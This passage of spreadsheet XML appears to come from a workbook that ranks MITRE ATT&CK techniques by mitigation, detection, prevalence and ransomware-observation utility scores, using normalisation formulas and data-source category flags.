        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M190" s="37">
        <v>0</v>
      </c>
      <c r="N190" s="56">
        <v>0</v>
      </c>
      <c r="O190" s="56">
        <v>3</v>
      </c>
      <c r="P190" s="56">
        <v>6</v>
      </c>
      <c r="Q190" s="56">
        <v>3</v>
      </c>
      <c r="R190" s="57" t="s">
        <v>682</v>
      </c>
      <c r="S190" s="57">
        <v>7</v>
      </c>
      <c r="T190" s="57" t="s">
        <v>678</v>
      </c>
      <c r="U190" s="57">
        <v>14</v>
      </c>
      <c r="V190" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.25714276190476193</v>
      </c>
      <c r="W190" s="37">
        <v>21</v>
      </c>
      <c r="X190" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y190" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z190" s="37">
        <v>12</v>
      </c>
      <c r="AA190" s="37">
        <v>0.12</v>
      </c>
      <c r="AB190" s="37">
        <v>0.12</v>
      </c>
      <c r="AC190" s="37"/>
      <c r="AD190" s="50" t="s">
        <v>683</v>
      </c>
      <c r="AE190" s="37" t="str" cm="1">
        <f t="array" ref="AE190">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD190)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF190" s="37">
        <v>186</v>
      </c>
      <c r="AG190" s="37" t="str" cm="1">
        <f t="array" ref="AG190">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD190)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH190" s="37">
        <v>186</v>
      </c>
      <c r="AI190" s="37" t="str" cm="1">
        <f t="array" ref="AI190">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD190)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ190" s="37">
        <v>186</v>
      </c>
      <c r="AK190" s="37" t="str" cm="1">
        <f t="array" ref="AK190">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD190)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL190" s="37">
        <v>186</v>
      </c>
      <c r="AM190" s="37" t="str" cm="1">
        <f t="array" ref="AM190">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD190)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN190" s="37">
        <v>0</v>
      </c>
      <c r="AO190" s="37">
        <v>2</v>
      </c>
      <c r="AP190" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ190" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>88.690452539682539</v>
      </c>
      <c r="AR190" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS190" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT190" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU19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4.2709739304610723</v>
      </c>
    </row>
    <row r="191" spans="1:47" ht="34">
      <c r="A191" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B191" s="37">
        <f t="shared" si="2"/>
        <v>214.00017833333337</v>
      </c>
      <c r="C191" s="37" t="s">
        <v>684</v>
      </c>
      <c r="D191" s="50" t="s">
        <v>676</v>
      </c>
      <c r="E191" s="37" t="s">
        <v>685</v>
      </c>
      <c r="F191" s="37">
        <v>1</v>
      </c>
      <c r="G191" s="37">
        <v>1</v>
      </c>
      <c r="H191" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I191" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J191" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K191" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L191" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M191" s="37">
        <v>0</v>
      </c>
      <c r="N191" s="56">
        <v>0</v>
      </c>
      <c r="O191" s="56">
        <v>1</v>
      </c>
      <c r="P191" s="56">
        <v>0</v>
      </c>
      <c r="Q191" s="56">
        <v>0</v>
      </c>
      <c r="R191" s="57" t="s">
        <v>686</v>
      </c>
      <c r="S191" s="57">
        <v>5</v>
      </c>
      <c r="T191" s="57" t="s">
        <v>678</v>
      </c>
      <c r="U191" s="57">
        <v>14</v>
      </c>
      <c r="V191" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.18571452380952383</v>
      </c>
      <c r="W191" s="37">
        <v>19</v>
      </c>
      <c r="X191" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y191" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z191" s="37">
        <v>1</v>
      </c>
      <c r="AA191" s="37">
        <v>0.01</v>
      </c>
      <c r="AB191" s="37">
        <v>0.01</v>
      </c>
      <c r="AC191" s="37"/>
      <c r="AD191" s="50" t="s">
        <v>683</v>
      </c>
      <c r="AE191" s="37" t="str" cm="1">
        <f t="array" ref="AE191">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD191)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF191" s="37">
        <v>187</v>
      </c>
      <c r="AG191" s="37" t="str" cm="1">
        <f t="array" ref="AG191">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD191)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH191" s="37">
        <v>187</v>
      </c>
      <c r="AI191" s="37" t="str" cm="1">
        <f t="array" ref="AI191">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD191)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ191" s="37">
        <v>187</v>
      </c>
      <c r="AK191" s="37" t="str" cm="1">
        <f t="array" ref="AK191">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD191)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL191" s="37">
        <v>187</v>
      </c>
      <c r="AM191" s="37" t="str" cm="1">
        <f t="array" ref="AM191">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD191)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN191" s="37">
        <v>0</v>
      </c>
      <c r="AO191" s="37">
        <v>0</v>
      </c>
      <c r="AP191" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ191" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>71.333392777777789</v>
      </c>
      <c r="AR191" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS191" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT191" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU19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92" spans="1:47" ht="34">
      <c r="A192" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B192" s="37">
        <f t="shared" si="2"/>
        <v>329.88564257142855</v>
      </c>
      <c r="C192" s="37" t="s">
        <v>687</v>
      </c>
      <c r="D192" s="50" t="s">
        <v>676</v>
      </c>
      <c r="E192" s="37" t="s">
        <v>688</v>
      </c>
      <c r="F192" s="37">
        <v>1</v>
      </c>
      <c r="G192" s="37">
        <v>1</v>
      </c>
      <c r="H192" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I192" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J192" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K192" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L192" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M192" s="37">
        <v>0</v>
      </c>
      <c r="N192" s="56">
        <v>0</v>
      </c>
      <c r="O192" s="56">
        <v>8</v>
      </c>
      <c r="P192" s="56">
        <v>6</v>
      </c>
      <c r="Q192" s="56">
        <v>15</v>
      </c>
      <c r="R192" s="57" t="s">
        <v>682</v>
      </c>
      <c r="S192" s="57">
        <v>7</v>
      </c>
      <c r="T192" s="57" t="s">
        <v>678</v>
      </c>
      <c r="U192" s="57">
        <v>14</v>
      </c>
      <c r="V192" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.33809514285714282</v>
      </c>
      <c r="W192" s="37">
        <v>21</v>
      </c>
      <c r="X192" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y192" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z192" s="37">
        <v>29</v>
      </c>
      <c r="AA192" s="37">
        <v>0.28999999999999998</v>
      </c>
      <c r="AB192" s="37">
        <v>0.28999999999999998</v>
      </c>
      <c r="AC192" s="37"/>
      <c r="AD192" s="50" t="s">
        <v>683</v>
      </c>
      <c r="AE192" s="37" t="str" cm="1">
        <f t="array" ref="AE192">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD192)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF192" s="37">
        <v>188</v>
      </c>
      <c r="AG192" s="37" t="str" cm="1">
        <f t="array" ref="AG192">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD192)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH192" s="37">
        <v>188</v>
      </c>
      <c r="AI192" s="37" t="str" cm="1">
        <f t="array" ref="AI192">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD192)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ192" s="37">
        <v>188</v>
      </c>
      <c r="AK192" s="37" t="str" cm="1">
        <f t="array" ref="AK192">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD192)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL192" s="37">
        <v>188</v>
      </c>
      <c r="AM192" s="37" t="str" cm="1">
        <f t="array" ref="AM192">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD192)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN192" s="37">
        <v>0</v>
      </c>
      <c r="AO192" s="37">
        <v>0</v>
      </c>
      <c r="AP192" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ192" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>109.96188085714284</v>
      </c>
      <c r="AR192" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS192" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT192" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU19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93" spans="1:47" ht="34">
      <c r="A193" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B193" s="37">
        <f t="shared" si="2"/>
        <v>252.33333333333337</v>
      </c>
      <c r="C193" s="37" t="s">
        <v>689</v>
      </c>
      <c r="D193" s="50" t="s">
        <v>676</v>
      </c>
      <c r="E193" s="37" t="s">
        <v>690</v>
      </c>
      <c r="F193" s="37">
        <v>1</v>
      </c>
      <c r="G193" s="37">
        <v>1</v>
      </c>
      <c r="H193" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I193" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J193" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K193" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L193" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M193" s="37">
        <v>0</v>
      </c>
      <c r="N193" s="56">
        <v>0</v>
      </c>
      <c r="O193" s="56">
        <v>0</v>
      </c>
      <c r="P193" s="56">
        <v>0</v>
      </c>
      <c r="Q193" s="56">
        <v>5</v>
      </c>
      <c r="R193" s="57" t="s">
        <v>677</v>
      </c>
      <c r="S193" s="57">
        <v>8</v>
      </c>
      <c r="T193" s="57" t="s">
        <v>678</v>
      </c>
      <c r="U193" s="57">
        <v>14</v>
      </c>
      <c r="V193" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.23333333333333336</v>
      </c>
      <c r="W193" s="37">
        <v>22</v>
      </c>
      <c r="X193" s="37">
        <v>0.4</v>
      </c>
      <c r="Y193" s="37">
        <v>0.4</v>
      </c>
      <c r="Z193" s="37">
        <v>5</v>
      </c>
      <c r="AA193" s="37">
        <v>0.05</v>
      </c>
      <c r="AB193" s="37">
        <v>0.05</v>
      </c>
      <c r="AC193" s="37"/>
      <c r="AD193" s="50" t="s">
        <v>683</v>
      </c>
      <c r="AE193" s="37" t="str" cm="1">
        <f t="array" ref="AE193">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD193)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF193" s="37">
        <v>189</v>
      </c>
      <c r="AG193" s="37" t="str" cm="1">
        <f t="array" ref="AG193">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD193)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH193" s="37">
        <v>189</v>
      </c>
      <c r="AI193" s="37" t="str" cm="1">
        <f t="array" ref="AI193">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD193)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ193" s="37">
        <v>189</v>
      </c>
      <c r="AK193" s="37" t="str" cm="1">
        <f t="array" ref="AK193">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD193)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL193" s="37">
        <v>189</v>
      </c>
      <c r="AM193" s="37" t="str" cm="1">
        <f t="array" ref="AM193">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD193)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN193" s="37">
        <v>0</v>
      </c>
      <c r="AO193" s="37">
        <v>0</v>
      </c>
      <c r="AP193" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ193" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>84.111111111111128</v>
      </c>
      <c r="AR193" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS193" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT193" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU19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94" spans="1:47" ht="34">
      <c r="A194" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B194" s="37">
        <f t="shared" si="2"/>
        <v>259.102236</v>
      </c>
      <c r="C194" s="37" t="s">
        <v>691</v>
      </c>
      <c r="D194" s="50" t="s">
        <v>692</v>
      </c>
      <c r="E194" s="37"/>
      <c r="F194" s="37">
        <v>3</v>
      </c>
      <c r="G194" s="37">
        <v>2</v>
      </c>
      <c r="H194" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I194" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J194" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K194" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L194" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M194" s="37">
        <v>0</v>
      </c>
      <c r="N194" s="56">
        <v>0</v>
      </c>
      <c r="O194" s="56">
        <v>0</v>
      </c>
      <c r="P194" s="56">
        <v>1</v>
      </c>
      <c r="Q194" s="56">
        <v>0</v>
      </c>
      <c r="R194" s="57" t="s">
        <v>693</v>
      </c>
      <c r="S194" s="57">
        <v>2</v>
      </c>
      <c r="T194" s="57" t="s">
        <v>694</v>
      </c>
      <c r="U194" s="57">
        <v>7</v>
      </c>
      <c r="V194" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.0476000000000001E-2</v>
      </c>
      <c r="W194" s="37">
        <v>9</v>
      </c>
      <c r="X194" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y194" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z194" s="37">
        <v>1</v>
      </c>
      <c r="AA194" s="37">
        <v>0.01</v>
      </c>
      <c r="AB194" s="37">
        <v>0.01</v>
      </c>
      <c r="AC194" s="37"/>
      <c r="AD194" s="50" t="s">
        <v>413</v>
      </c>
      <c r="AE194" s="37" t="str" cm="1">
        <f t="array" ref="AE194">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD194)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF194" s="37">
        <v>190</v>
      </c>
      <c r="AG194" s="37" t="str" cm="1">
        <f t="array" ref="AG194">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD194)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH194" s="37">
        <v>190</v>
      </c>
      <c r="AI194" s="37" t="str" cm="1">
        <f t="array" ref="AI194">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD194)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ194" s="37">
        <v>190</v>
      </c>
      <c r="AK194" s="37" t="str" cm="1">
        <f t="array" ref="AK194">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD194)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL194" s="37">
        <v>190</v>
      </c>
      <c r="AM194" s="37" t="str" cm="1">
        <f t="array" ref="AM194">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD194)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN194" s="37">
        <v>0</v>
      </c>
      <c r="AO194" s="37">
        <v>0</v>
      </c>
      <c r="AP194" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ194" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>86.367412000000002</v>
      </c>
      <c r="AR194" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS194" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT194" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU19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95" spans="1:47" ht="85">
      <c r="A195" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.56666666666666665</v>
      </c>
      <c r="B195" s="37">
        <f t="shared" si="2"/>
        <v>1227.6426750000001</v>
      </c>
      <c r="C195" s="37" t="s">
        <v>695</v>
      </c>
      <c r="D195" s="50" t="s">
        <v>696</v>
      </c>
      <c r="E195" s="37"/>
      <c r="F195" s="37">
        <v>1</v>
      </c>
      <c r="G195" s="37">
        <v>1</v>
      </c>
      <c r="H195" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I195" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J195" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K195" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L195" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M195" s="37">
        <v>1</v>
      </c>
      <c r="N195" s="56">
        <v>8</v>
      </c>
      <c r="O195" s="56">
        <v>62</v>
      </c>
      <c r="P195" s="56">
        <v>5</v>
      </c>
      <c r="Q195" s="56">
        <v>25</v>
      </c>
      <c r="R195" s="57">
        <v>4.0999999999999996</v>
      </c>
      <c r="S195" s="57">
        <v>1</v>
      </c>
      <c r="T195" s="57" t="s">
        <v>697</v>
      </c>
      <c r="U195" s="57">
        <v>2</v>
      </c>
      <c r="V195" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.50476166666666666</v>
      </c>
      <c r="W195" s="37">
        <v>3</v>
      </c>
      <c r="X195" s="37">
        <v>5.4545000000000003E-2</v>
      </c>
      <c r="Y195" s="37">
        <v>5.4545000000000003E-2</v>
      </c>
      <c r="Z195" s="37">
        <v>100</v>
      </c>
      <c r="AA195" s="37">
        <v>1</v>
      </c>
      <c r="AB195" s="37">
        <v>1</v>
      </c>
